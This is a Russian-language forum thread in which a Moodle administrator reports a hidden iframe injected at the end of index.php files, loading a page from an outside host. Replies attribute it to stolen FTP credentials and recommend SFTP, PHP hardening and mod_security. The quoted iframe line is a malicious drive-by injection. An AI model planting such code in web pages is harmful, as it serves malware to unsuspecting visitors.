Вопрос по безопасности moodle.

Вопрос по безопасности moodle.

от Сергей Буянов -
Количество ответов: 5

Насколько мудл хорошо защищена от уязвимостей?

Вчера обнаружил постороннюю вставку в конце файлов index.php

<iframe src="http://b1a.ru:8080/index.php" width=105 height=125 style="visibility: hidden"></iframe>

Откуда она могла появиться? И как с ней бороться?

В ответ на Сергей Буянов

Re: Вопрос по безопасности moodle.

от Michael Goncharenko -
Моё мнение: мудл хорошо защищён одобряю
Можно походить по трекеру и посмотреть отчёты о найденных в мудле уязвимостях, которые позволили бы записывать файлы на сервер прямо в папки с ПО moodle. Практически уверен, что таких не найдётся.

Скорее всего, кто-то залил на вашу машину троянчика, увёл пароль для ftp и пропатчил файлы мудла. Но это уже уязвимость не мудла.
В ответ на Michael Goncharenko

Re: Вопрос по безопасности moodle.

от Dmitry Pupinin -
Больше того, я предполагаю, что существуют автоматизированные системы внесения инекций в сайты.
Лично видел сайт на Вордпрессе в котором была инекция открывающая всплывающее окно с недетским сайтом, причем после залогинивания в админку и удаления постороннего кода он снова появлялся через некоторое время. Причем смена пароля не помогала! Я предложил сменить пароль с другого компа и после этого патчинг прекратился... улыбаюсь
Выглядело это именно как автоматическая система... подразумеваю что подобное может появиться и для Мудл...
В ответ на Dmitry Pupinin

Re: Вопрос по безопасности moodle.

от Michael Goncharenko -
Да, я согласен. Такое программно делается куда быстрее, чем вручную.

У нас когда-то была такая ситуация, что системы (typo3 и какой-то wiki-движок) начали загружать на компьютеры посетителей всякие странные штучки.

Мы посмотрели логи ftp-сервера и обнаружили, что кто-то скачивал .php скрипты и тут же заливал их обратно. Видимо, уже пропатченные. Я на 99.8% уверен, что у Сергея именно это и случилось.
В ответ на Michael Goncharenko

Re: Вопрос по безопасности moodle.

от Aliaksandr Shvayakou -
ftp-сервера очень слабо защищены и требуют специальных мер для укрепления защиты (виртуализация корня фс и т.д.). Гораздо разумнее для передачи файлов использовать ssh и winscp в качестве клиента для "подоконников". Защита будет на высшем уровне и не требуется дополнительного сервиса, ssh всегда есть.

PHP могу рекомендовать укрепить патчами
http://www.hardened-php.net/suhosin/
http://www.xakep.ru/magazine/xa/106/154/1.asp

А для защиты вебприложений очень разумно использовать mod_security.
http://www.howtoforge.com/apache_mod_security
Модуль отслеживает опасные последовательности в запрашиваемых ссылках и рубит все подозрительное. Это не абсолютная защита, но вы будете защищены от известных атак типа PHP Include, SQL Injection, Cross site scripting (XSS) и прочих. Можно дополнять фунционал самостоятельно, там используется обычный файл с набором регулярных выражений.
Только не торопитесь модуль включать на рабочем сервере, скорее всего, без вдумчивой настройки, он будет обрубать и допустимые (безопасные) действия пользователей.

И, хотя за этим следит много глаз, на уровне самого moodle тоже конечно возможны дырки и мы сами иногда их открываем, например разрешаем использовать swf. Не ленитесь участвовать в разборе обнаруженных уязвимостей, это полезно и Вам лично и всему сообществу.

Да, еще замечу, что от дырок на уровне вебприложений можно прикрыться средствами системы. Используйте специальные атрибуты файлов, средства наблюдения за целостностью и прочие инструменты.

В ответ на Michael Goncharenko

Re: Вопрос по безопасности moodle.

от Сергей Буянов -

Большое спасибо за советы.

Вчера  пришлось потратить полдня для очистки сайта от вредоносного кода Сердитый(антивирус вручную ).  

Еще проверили штатным антивирусом компы всех, кто мог иметь FTP доступ. И действительно у одного сотрудника на персональном компе обнаружились троянчеги. 

Все пароли поменяли и перешли на sftp по  winscp. Очень хочется надеятся, что проблема этим себя исчерпала.